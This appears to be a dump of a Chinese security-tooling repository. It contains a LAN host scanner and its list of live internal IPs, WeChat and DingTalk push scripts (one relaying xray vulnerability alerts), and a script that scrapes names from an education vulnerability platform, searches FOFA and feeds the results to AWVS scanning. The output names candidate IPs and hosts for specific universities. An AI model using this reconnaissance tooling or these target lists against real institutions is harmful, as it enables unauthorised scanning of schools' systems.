51 | #print(f"192.168.{i1}.0") 52 | 53 | IP_192_range.append(f"192.168.{i1}.1/24") 54 | #print(f"172.17.{i1}.0") 55 | IP_172_range.append(f"172.17.{i1}.1/24") 56 | #print(f"10.2.{i1}.0") 57 | IP_10_2_range.append(f"10.2.{i1}.1/24") 58 | #print(f"10.1.{i1}.0") 59 | IP_10_1_range.append(f"10.1.{i1}.1/24") 60 | ip = queue.Queue() 61 | for i in IP_10_2_range: 62 | ip.put(i) 63 | IP_range =ip 64 | Thread(IP_range) 65 | # for i2 in IP_range: 66 | # scan(i) -------------------------------------------------------------------------------- /局域网扫描/存活的主机.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.1 2 | 192.168.1.138 3 | 192.168.1.238 4 | 192.168.10.1 5 | 192.168.10.255 6 | 192.168.12.1 7 | 192.168.11.1 8 | 192.168.11.255 9 | 192.168.16.1 10 | 192.168.17.1 11 | 192.168.17.251 12 | 192.168.15.0 13 | 192.168.15.1 14 | 192.168.15.255 15 | 192.168.15.3 16 | 192.168.15.4 17 | 192.168.20.1 18 | 192.168.20.127 19 | 192.168.20.130 20 | 192.168.20.162 21 | 192.168.20.185 22 | 192.168.20.231 23 | 192.168.20.38 24 | 192.168.20.39 25 | 192.168.20.43 26 | 192.168.22.1 27 | 192.168.22.254 28 | 192.168.22.8 29 | 192.168.25.1 30 | 192.168.26.1 31 | 192.168.27.1 32 | 192.168.28.1 33 | 192.168.23.1 34 | 192.168.23.25 35 | 192.168.24.1 36 | 192.168.31.1 37 | 192.168.32.1 38 | 192.168.32.254 39 | 192.168.33.1 40 | 192.168.33.167 41 | 192.168.34.1 42 | 192.168.35.1 43 | 192.168.35.250 44 | 192.168.21.1 45 | 192.168.36.1 46 | 192.168.29.1 47 | 192.168.39.1 48 | 192.168.40.1 49 | 192.168.41.1 50 | 192.168.41.102 51 | 192.168.41.104 52 | 192.168.41.105 53 | 192.168.41.106 54 | 192.168.41.108 55 | 192.168.41.11 56 | 192.168.41.110 57 | 192.168.41.113 58 | 192.168.41.114 59 | 192.168.41.115 60 | 192.168.41.118 61 | 192.168.41.12 62 | 192.168.41.124 63 | 192.168.41.126 64 | 192.168.41.128 65 | 192.168.41.13 66 | 192.168.41.134 67 | 192.168.41.135 68 | 192.168.41.136 69 | 192.168.41.138 70 | 192.168.41.14 71 | 192.168.41.15 72 | 192.168.41.18 73 | 192.168.41.20 74 | 192.168.41.23 75 | 192.168.41.24 76 | 192.168.41.249 77 | 192.168.41.25 78 | 192.168.41.250 79 | 192.168.41.251 80 | 192.168.41.252 81 | 192.168.41.253 82 | 192.168.41.254 83 | 192.168.41.26 84 | 192.168.41.27 85 | 192.168.41.28 86 | 192.168.41.32 87 | 192.168.41.33 88 | 192.168.41.36 89 | 192.168.41.37 90 | 192.168.41.38 91 | 192.168.41.40 92 | 192.168.41.41 93 | 192.168.41.42 94 | 192.168.41.43 95 | 192.168.41.44 96 | 192.168.41.45 97 | 192.168.41.46 98 | 192.168.41.51 99 | 192.168.41.55 100 | 192.168.41.56 101 | 192.168.41.57 102 | 192.168.41.58 103 | 192.168.41.59 104 | 192.168.41.6 105 | 192.168.41.60 106 | 192.168.41.63 107 | 192.168.41.66 108 | 192.168.41.98 109 | 192.168.42.1 110 | 192.168.43.1 111 | 192.168.44.1 112 | 192.168.37.1 113 | 192.168.38.1 114 | 192.168.38.250 115 | 192.168.51.1 116 | 192.168.51.143 117 | 192.168.51.231 118 | 192.168.51.232 119 | 192.168.51.238 120 | 192.168.51.239 121 | 192.168.61.1 122 | 192.168.61.238 123 | 192.168.61.255 124 | 192.168.64.1 125 | 192.168.64.231 126 | 192.168.64.235 127 | 192.168.64.236 128 | 192.168.64.239 129 | 192.168.71.1 130 | 192.168.71.221 131 | 192.168.71.222 132 | 192.168.71.223 133 | 192.168.71.224 134 | 192.168.71.225 135 | 192.168.71.226 136 | 192.168.71.227 137 | 192.168.71.228 138 | 192.168.71.229 139 | 192.168.71.240 140 | 192.168.71.241 141 | 192.168.71.242 142 | 192.168.71.247 143 | 192.168.71.249 144 | 192.168.80.1 145 | 192.168.80.10 146 | 192.168.80.100 147 | 192.168.80.101 148 | 192.168.80.102 149 | 192.168.80.103 150 | 192.168.80.104 151 | 192.168.80.105 152 | 192.168.80.106 153 | 192.168.80.107 154 | 192.168.80.108 155 | 192.168.80.11 156 | 192.168.80.110 157 | 192.168.80.111 158 | 192.168.80.112 159 | 192.168.80.114 160 | 192.168.80.116 161 | 192.168.80.117 162 | 192.168.80.118 163 | 192.168.80.119 164 | 192.168.80.12 165 | 192.168.80.121 166 | 192.168.80.122 167 | 192.168.80.124 168 | 192.168.80.125 169 | 192.168.80.127 170 | 192.168.80.128 171 | 192.168.80.13 172 | 192.168.80.14 173 | 192.168.80.15 174 | 192.168.80.151 175 | 192.168.80.152 176 | 192.168.80.153 177 | 192.168.80.154 178 | 192.168.80.16 179 | 192.168.80.17 180 | 192.168.80.170 181 | 192.168.80.171 182 | 192.168.80.172 183 | 192.168.80.18 184 | 192.168.80.19 185 | 192.168.80.20 186 | 192.168.80.21 187 | 192.168.80.22 188 | 192.168.80.23 189 | 192.168.80.230 190 | 192.168.80.24 191 | 192.168.80.25 192 | 192.168.80.26 193 | 192.168.80.27 194 | 192.168.80.28 195 | 192.168.80.29 196 | 192.168.80.3 197 | 192.168.80.30 198 | 192.168.80.31 199 | 192.168.80.32 200 | 192.168.80.33 201 | 192.168.80.34 202 | 192.168.80.35 203 | 192.168.80.38 204 | 192.168.80.39 205 | 192.168.80.4 206 | 192.168.80.40 207 | 192.168.80.41 208 | 192.168.80.5 209 | 192.168.80.51 210 | 192.168.80.52 211 | 192.168.80.53 212 | 192.168.80.54 213 | 192.168.80.55 214 | 192.168.80.56 215 | 192.168.80.57 216 | 192.168.80.58 217 | 192.168.80.59 218 | 192.168.80.6 219 | 192.168.80.60 220 | 192.168.80.61 221 | 192.168.80.62 222 | 192.168.80.63 223 | 192.168.80.64 224 | 192.168.80.65 225 | 192.168.80.66 226 | 192.168.80.67 227 | 192.168.80.68 228 | 192.168.80.69 229 | 192.168.80.7 230 | 192.168.80.70 231 | 192.168.80.71 232 | 192.168.80.72 233 | 192.168.80.73 234 | 192.168.80.74 235 | 192.168.80.75 236 | 192.168.80.78 237 | 192.168.80.79 238 | 192.168.80.8 239 | 192.168.80.81 240 | 192.168.80.9 241 | 192.168.80.93 242 | 192.168.80.95 243 | 192.168.80.97 244 | 192.168.80.98 245 | 192.168.80.99 246 | 192.168.91.1 247 | 192.168.92.1 248 | 192.168.93.1 249 | 192.168.94.1 250 | 192.168.95.1 251 | 192.168.130.1 252 | 192.168.130.110 253 | 192.168.130.12 254 | 192.168.131.1 255 | 192.168.143.1 256 | 192.168.142.1 257 | 192.168.142.255 258 | 192.168.141.1 259 | 192.168.144.1 260 | 192.168.145.1 261 | 192.168.146.1 262 | 192.168.147.1 263 | 192.168.148.1 264 | 192.168.153.1 265 | 192.168.154.1 266 | 192.168.152.1 267 | 192.168.152.15 268 | 192.168.157.1 269 | 192.168.155.1 270 | 192.168.161.1 271 | 192.168.156.1 272 | 192.168.156.255 273 | 192.168.151.1 274 | 192.168.151.255 275 | 192.168.250.1 276 | 192.168.251.1 277 | 192.168.252.1 278 | 172.17.0.1 279 | -------------------------------------------------------------------------------- /微信钉钉推送/公众号推送.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | 4 | 5 | class SendMessage(): # 定义发送消息的类 6 | def __init__(self): 7 | self.appID = '' # appid 注册时有 8 | self.appsecret = '' # appsecret 同上 9 | self.template_id = '' # 模板id 10 | self.access_token = self.get_access_token() # 获取 access token 11 | self.opend_ids = self.get_openid() # 获取关注用户的openid 12 | 13 | def get_access_token(self): 14 | """ 15 | 获取access_token 16 | 通过查阅微信公众号的开发说明就清晰明了了 17 | """ 18 | url = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}'. \ 19 | format(self.appID, self.appsecret) 20 | headers = { 21 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36' 22 | } 23 | response = requests.get(url, headers=headers).json() 24 | access_token = response.get('access_token') 25 | return access_token 26 | 27 | def get_openid(self): 28 | """ 29 | 获取所有用户的openid 30 | 微信公众号开发文档中可以查阅获取openid的方法 31 | """ 32 | next_openid = '' 33 | url_openid = 'https://api.weixin.qq.com/cgi-bin/user/get?access_token=%s&next_openid=%s' % ( 34 | self.access_token, next_openid) 35 | ans = requests.get(url_openid) 36 | open_ids = json.loads(ans.content)['data']['openid'] 37 | return open_ids 38 | 39 | def sendmsg(self): 40 | """ 41 | 给所有用户发送消息 42 | """ 43 | url = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=o8ayp6L5TMlPo-hv3DElQT81JZo4".format(self.access_token) 44 | 45 | if self.opend_ids != '': 46 | for open_id in self.opend_ids: 47 | body = { 48 | "touser": open_id, 49 | "template_id": self.template_id, 50 | "url": "https://www.baidu.com/", 51 | "topcolor": "#FF0000", 52 | # 对应模板中的数据模板 53 | "data": { 54 | "frist": { 55 | "value": self.dataJson.get("frist"), 56 | "color": "#FF99CC" # 文字颜色 57 | }, 58 | "body": { 59 | "value": self.dataJson.get("body"), 60 | "color": "#EA0000" 61 | }, 62 | "weather": { 63 | "value": self.dataJson.get("weather"), 64 | "color": "#00EC00" 65 | }, 66 | "date": { 67 | "value": self.dataJson.get("date"), 68 | "color": "#6F00D2" 69 | }, 70 | "last": { 71 | "value": self.dataJson.get("last"), 72 | "color": "#66CCFF" 73 | } 74 | } 75 | } 76 | data = bytes(json.dumps(body, ensure_ascii=False).encode('utf-8')) # 将数据编码json并转换为bytes型 77 | response = requests.post(url, data=data) 78 | result = response.json() # 将返回信息json解码 79 | print(result) # 根据response查看是否广播成功 80 | else: 81 | print("当前没有用户关注该公众号!") 82 | if __name__ == "__main__": 83 | sends = SendMessage() 84 | sends.sendmsg() 85 | -------------------------------------------------------------------------------- /微信钉钉推送/钉钉推送.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request 2 | import requests 3 | import datetime 4 | import logging 5 | import json 6 | 7 | app = Flask(__name__) 8 | 9 | @app.route('/webhook', methods=['POST']) 10 | 11 | def xray_webhook(): 12 | vuln = request.json 13 | #print(vuln) 14 | content = f""" 15 | xray 发现了新漏洞 16 | --------------- 17 | 插件: {vuln['data']["plugin"]} 18 | 漏洞类型: {vuln["type"]} 19 | 漏洞地址: {vuln['data']["target"]["url"]} 20 | 发现时间: {str(datetime.datetime.fromtimestamp(vuln["data"]["create_time"] / 1000))} 21 | --------------- 22 | 请及时查看和处理 23 | """ 24 | 25 | try: 26 | push_dingding_group(content) 27 | except Exception as e: 28 | logging.exception(e) 29 | print(content) 30 | return 'ok' 31 | 32 | 33 | def push_dingding_group(content): 34 | headers = {"Content-Type": "application/json"} 35 | # 消息类型和数据格式参照钉钉开发文档 36 | data = {"msgtype": "markdown", "markdown": {"title": "xray 发现了新漏洞"}} 37 | data['markdown']['text'] = content 38 | 39 | 40 | # 钉钉api 41 | r = requests.post("xx", data=json.dumps(data), 42 | headers=headers) 43 | print(r.text) 44 | 45 | if __name__ == '__main__': 46 | app.run() -------------------------------------------------------------------------------- /教育行业漏洞报告平台/学校名.txt: -------------------------------------------------------------------------------- 1 | 上海交通大学可能的地址['http://27.0.235.141:9100', 'http://27.0.235.252:8888', 'https://202.120.35.209:443', 'http://104.161.126.36:8377', 'https://202.120.35.189:443', 'https://202.120.35.144:443', 'https://202.120.35.177:443', 'http://13.214.164.240', 'https://180.168.200.206:443', 'http://18.138.255.147'] 2 | 江苏省教育厅可能的地址['http://demo.infowuxi.com:9051', 'http://222.187.122.88', 'http://woommall.com', 'http://www.woommall.com', 'http://210.28.168.15', 'http://new.zdhealthcare.com', 'http://www.testing.muzhuzhen.cn', 'http://rsc.njupt.edu.cn', 'http://yctc.las.chaoxing.com', 'http://caiwu.yctu.edu.cn'] 3 | 清华大学可能的地址['https://203.176.124.51', 'http://27.0.235.141:9100', 'http://27.0.235.252:8888', 'http://223.0.12.10:8082', 'http://104.161.126.36:8377', 'https://219.223.190.55:443', 'https://219.223.190.108:443', 'https://219.223.190.193:443', 'https://219.223.190.161:443', 'https://114.242.187.30:443'] 4 | 5 | ![image-20211211031943086](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/image-20211211031943086.png) 6 | -------------------------------------------------------------------------------- /教育行业漏洞报告平台/教育行业漏洞报告平台.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from lxml import etree 3 | import base64 4 | import time 5 | 6 | print("--------------------------------------------------") 7 | print("+\t\t _____ ____ ____ \t\t+") 8 | print("+\t\t|__ / / ___| / ___| \t\t+") 9 | print("+\t\t / / \___ \ \___ \ \t\t+") 10 | print("+\t\t / /_ ___) | ___) |\t\t+") 11 | print("+\t\t/____|___|____/___|____/ \t\t+") 12 | print("+\t\t |_____| |_____| \t\t") 13 | print("") 14 | print("\t*在教育行业漏洞报告平台提取名在搜索引擎提取相关URL") 15 | print("\t*AWVS进行自动化漏洞扫描") 16 | print("\t*提取出来的会保存当前目录下的学校名.txt") 17 | print("---------------------------------------------------") 18 | 19 | 20 | 21 | headers = { # 定义User-Agent请求头,用键值对的方式 22 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36", 23 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 24 | 25 | } 26 | 27 | 28 | save=open("学校.txt","w") 29 | 30 | url = "https://src.sjtu.edu.cn/rank/firm/?page=" 31 | try: 32 | for i in range(1,197): 33 | 34 | 35 | html = requests.get(url+str(i), headers=headers) 36 | 37 | html=etree.HTML(html.text) 38 | 39 | divs=html.xpath(r'//td/a/text()') # 语法 40 | 41 | 42 | for address_save in divs: 43 | print("正在提取:"+address_save) 44 | print("只提取就一页:提取会等待4秒进行发送请求以防被屏蔽IP") 45 | time.sleep(4) 46 | coding = base64.b64encode(address_save.encode('utf-8')).decode("utf-8") 47 | html = requests.get("https://fofa.so/result?qbase64=" + str(coding), headers) 48 | html = etree.HTML(html.text) 49 | divs = html.xpath(r'//span/a/@href') # 语法 50 | for i in divs: 51 | print("可能的地址"+i) 52 | 53 | save.write(address_save +"可能的地址"+str(divs)+"\n") 54 | save.close() 55 | 56 | except Exception as bc: 57 | print("出差了:"+str(bc)) --------------------------------------------------------------------------------